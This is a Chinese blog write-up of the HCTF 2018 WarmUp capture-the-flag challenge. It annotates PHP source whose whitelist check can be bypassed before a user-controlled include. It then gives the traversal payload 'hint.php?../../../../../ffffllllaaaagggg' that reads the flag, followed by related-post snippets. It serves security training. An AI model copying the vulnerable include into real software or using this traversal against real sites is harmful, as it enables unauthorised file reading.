Web——[HCTF 2018]WarmUp

最新推荐文章于 2025-12-05 14:31:02 发布
原创 最新推荐文章于 2025-12-05 14:31:02 发布 · 104 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

本文详细介绍了HCTF2018 WarmUp题目的解题过程,通过逐步分析PHP源码,利用文件包含漏洞获取flag。文章展示了如何绕过白名单限制,最终成功找到正确答案。

[HCTF 2018]WarmUp

刷题平台:https://buuoj.cn

题目地址:https://buuoj.cn/challenges#[HCTF%202018]WarmUp

解题步骤:

1、访问:http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn

 2、出现一个滑稽头像并按快捷键F12查看源码,出现提示信息source.php

 3、将/source.php复制到地址栏已有地址后面

http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/source.php

访问后可看见PHP源码(可以把源码复制到本地后去分析)

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
      //定义白名单,1个是source.php,1个是hint.php
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];   //可以直接访问hint.php

            // 判断变量是否声明,判断是否为字符串
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            //判断是否在白名单内
            if (in_array($page, $whitelist)) {
                return true;
            }
             //截取两个问号之间的值,该值需要在白名单参数内
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?') //?flag
            );
           //如果参数为白名单,则返回真
            if (in_array($_page, $whitelist)) {   //hint.php?../flag
                return true;
            }
           //url进行解码,并截取两个问号之间的值
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
          //再次校验是否在白名单内
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
        //传递参数不能为空,要是字符串,需要经过emmm类的过滤
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

4、http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/hint.php——》http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/ffffllllaaaagggg

5、返回上一步进行传参http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=hint.php

 

 http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=ffffllllaaaagggg

6、http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=hint.php?../../../../../ffffllllaaaagggg

7、填入后——》correct

 

 

知识点补充:

先来熟悉几个函数

//mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置// mb_strpos (haystack ,needle )// haystack:要被检查的字符串。// needle:要搜索的字符串

//mb_substr() 函数返回字符串的一部分。

//str 必需。从该 string 中提取子字符串。//start 必需。规定在字符串的何处开始。//length 可选。规定要返回的字符串长度。默认是直到字符串的结尾。

Arthur_hsp
关注
BUUCTF——WebHCTF 2018 WarmUp
cai_huaer的博客
02-20 1014
ffffllllaaaagggg”,发现没有“you can't see it”提示,页面是一片空白后,应该是跑到了include那去了,只是可能位置不对。仔细看checkFile方法,发现当page值是hint.php/ffffllllaaaagggg时,下面方法是false。再看一下代码,如果是文件夹,那么我们能用include漏洞去文件包含,那么需要执行到include那一行代码,需要前面三个条件都为真。的字符串,只要符合$whitelist数组中的值就行,source.php和hint.php。
BUUCTF[HCTF 2018]WarmUp 1题解
2301_79896143的博客
06-02 1149
BUUCTF[HCTF 2018]WarmUp题解:通过分析滑稽表情页面的PHP源码,发现文件包含漏洞。代码审计显示程序以白名单方式检查文件参数,但可通过构造payload绕过。利用hint.php提示的flag文件名,在参数后添加?/../../../../路径遍历访问根目录的ffffllllaaaagggg文件。最终通过多层../目录跳转获取flag{966bef86-ebda-43d8-8703-8e6a57b211de}。考察PHP代码审计和目录遍历漏洞利用能力。
HCTF 2018 WarmUp 1(代码审计)
Snk0xHeart的博客
06-16 886
php。
02 [HCTF 2018]WarmUp
weixin_60937978的博客
04-23 3237
(修改网页, 访问source.php?file=1 访问 hint.php
【BUUCTF】[HCTF 2018]WarmUp 1
qq_44761422的博客
08-28 2506
tips:include函数有这么一个神奇的功能:以字符‘/’分隔(而且不计个数),若是在前面的字符串所代表的文件无法被PHP找到,则PHP会自动包含‘/’后面的文件——注意是最后一个‘/’。这里的ffffllllaaaagggg是在hint.php中发现的,显然flag在这个文件里。31 //第二次过滤问号的函数(如果$page的值有?37 //第三次检测传进来的值是否匹配白名单列表。6 //白名单列表。访问hint.php。
BUUCTF——[HCTF 2018]WarmUp 1
小白一枚多多关注的博客
03-17 2733
这道题很有意思,因为它这道题和攻防世界中的某道题相似,可以说几乎做法都一样,都是php代码审计,在这里我们刚进入环境是一张笑脸 一般在打ctf中要是一个网页中只有一张图片我们首先想到的肯定是图片里面藏着某个数据(某年某个ctf比赛就是这样的),但这个不一样,因为题目已经提示了我们这里是php代码审计,所以我们就用各种手段来获取有利用价值的信息 可以看见它的源代码处有一个被注释掉的php文件,我们先去访问一下看一下是否能被打开 打开后就可以看见一堆的php代码,现在我们就可以正式的来解体了 这里是用f
第一题——[HCTF 2018]WarmUp
分享简单的安全技术
03-31 717
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,迎面而来的是一张滑稽图片,按f12查看,发现提示:source.php 第二步:在URL一栏输入访问提示给出的php页面 http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php 第三步:查看source.php页面给出的提示 <?php highlight_file(__FILE__); class emm
BUUCTF——[HCTF 2018]WarmUp
doraemon12345的博客
05-26 308
打开题目发现提示 根据提示找到下一步,映入眼帘的是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单 if (! is
[HCTF 2018]WarmUp1解题思路
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
11-04 1125
[HCTF 2018]WarmUp1目录穿越,代码审计解题思路
BUUCTF [HCTF 2018]WarmUp1
meiqianchifanle的博客
12-10 1384
打开题目之前发现有“PHP”与“代码审计”两种提示,心里大致有点数了,开始看题。
BUUCTF————[HCTF 2018]WarmUp
qq_61579604的博客
11-02 182
出现一堆php代码,但我们发现有一个hint.php文件那我们接着进入这个文件查看有哪些信息。题目上也提示了代码审计那么直接查看源代码,出现一个source.php文件。出现这个说明flag存在于ffffllllaaaagggg里面。打开靶机出现一个奸笑表情的页面。那我们查看这个文件看有些什么。
BUUCTF[HCTF 2018]WarmUp 1
10-21
CTF竞赛是网络安全领域中的一项竞技活动,通常包括解密、编码、二进制分析、逆向工程和Web漏洞挖掘等多种类型。在CTF竞赛中,参赛者通常需要解决一系列涉及网络安全的知识点和逻辑问题。 7. **文件包含漏洞**: ...
[HCTF 2018]WarmUp
m0_62709637的博客
05-28 6913
这个题的前身是一个cve漏洞(phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)) 刚入坑的小伙伴不要慌,我们一步一步慢慢来看 点开题目,日常f12发现有提示,所以我们进行访问 发现是源代码,让我们进行阅读(分为两块1、主函数部分 2、外部类) 外部方法: 这里对两个函数进行解释查询以下资料 (关于mb_strpos函数在测试时发现如果没有匹配到指定符号,将返回字符串长度) 我们进行一些本地测试加深理解: 代码如下: c.
React大模型网站-流式推送markdown转换问题以及开启 rehype-raw,rehype-sanitize,remark-gfm等插件的使用
m0_61998604的博客
12-04 922
本文介绍了在React大模型网站中实现流式推送Markdown转换的方法,重点讲解了ReactMarkdown库及其配套插件的使用。主要内容包括:1)ReactMarkdown基础用法;2)通过rehype-raw插件支持HTML标签渲染;3)使用rehype-sanitize防止XSS攻击;4)利用remark-gfm支持GitHub风格的Markdown语法;5)给出了完整的流式渲染实现方案,包含SSE推送、内容累积和实时更新等关键技术。文章还提供了完整的代码示例,帮助开发者快速实现安全可靠的Markd
Vue 通用复选框组互斥 Hooks:兼容 Element Plus + Ant Design Vue
a3212768093的博客
12-02 524
本文介绍了一个通用的Vue Hooks useExclusiveCheckbox,用于实现复选框组的互斥选择功能。该Hooks兼容ElementPlus和AntDesignVue两大UI库,主要特点包括:跨UI库兼容、轻量无依赖、灵活配置互斥选项值、全场景适配和类型安全。核心逻辑通过对比新旧选中值数组,自动处理互斥选项与其他选项的切换关系。文章提供了完整代码和使用示例,分别演示了在ElementPlus和AntDesignVue中的实现方式,并解答了常见问题。该方案可显著提升开发效率,适用于各类需要互斥选择
47、【Ubuntu】【Gitlab】拉出内网 Web 服务:Nginx 事件驱动分析(一)
HIT_Weston的博客
12-01 1076
本文分析了Python的http.server模块与Nginx在Web服务架构上的本质区别。作者指出http.server仅适用于开发测试,而GitLab等完整Web应用需要Nginx的高性能架构。重点阐述了Nginx的事件驱动模型:通过epoll实现异步非阻塞I/O,单线程可处理上万并发连接,避免了传统多线程的资源消耗。文章还展示了Nginx的C语言伪代码实现逻辑,说明其"不轮询、无阻塞、仅处理活跃连接"的核心机制。最后预告将继续深入分析Nginx配置优化等内容。
50、【Ubuntu】【Gitlab】拉出内网 Web 服务:http.server 单/多线程分析(二)
HIT_Weston的博客
12-04 1010
本文分析了Python的http.server模块在单线程和多线程模式下的性能表现。通过测试发现,单线程模式下(Python<3.7)并发请求会被阻塞,后发请求需要等待前一个请求完成;而多线程模式下(Python≥3.7)可以同时处理多个请求。作者通过slow_server.py脚本模拟耗时操作,使用time curl命令测试响应时间,验证了线程模型的差异。文章还指出Python 3.7是一个重要分水岭,官方将默认命令行服务器升级为多线程以提升用户体验。技术细节参考了CPython源码,并提供了Git
前端仿真驱动创新:西门子FLOEFD的行业价值与应用指南
最新发布
anscos的博客
12-05 570
西门子Simcenter FLOEFD作为嵌入CAD的CFD解决方案,精准击中了现代研发“高效迭代、精准预判”的核心需求,其技术革新与应用实践为多行业带来了研发模式的重构,成为高端装备设计不可或缺的核心工具。西门子FLOEFD以“CAD原生、智能高效、多场协同”为核心,打破了设计与仿真的壁垒,尤其适配新能源、电子、增材制造等快速迭代的行业。其价值不仅在于缩短研发周期、降低试验成本,更在于推动工程师将“仿真思维”融入设计全流程,实现从“经验驱动”到“数据驱动”的转型。
ruoyi集成camunda实现bpmn在线设计器
xrl2012的专栏
12-03 919
摘要: 本文介绍了如何在RuoYi-Vue2前端集成Camunda BPMN在线设计器,实现流程建模功能。通过npm安装bpmn-js等依赖包,配置vue.config.js解决转译和别名问题,并提供了测试页面代码示例。页面包含导入/导出XML/SVG、流程检查、部署等功能,支持BPMN流程设计器的初始化和基本操作。环境要求包括JDK 1.8+、MySQL 5.7+、Node 23+等。完整方案可参考若依工作流。
[HCTF 2018]WarmUp 1
04-01
好的,我现在需要帮用户解决HCTF 2018 WarmUp题目的解题思路。首先,我应该先回忆一下这个题目的基本情况。根据用户提供的引用内容,这题可能涉及到Web安全方面的挑战,比如CTF题目常见的漏洞类型,比如文件包含、...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值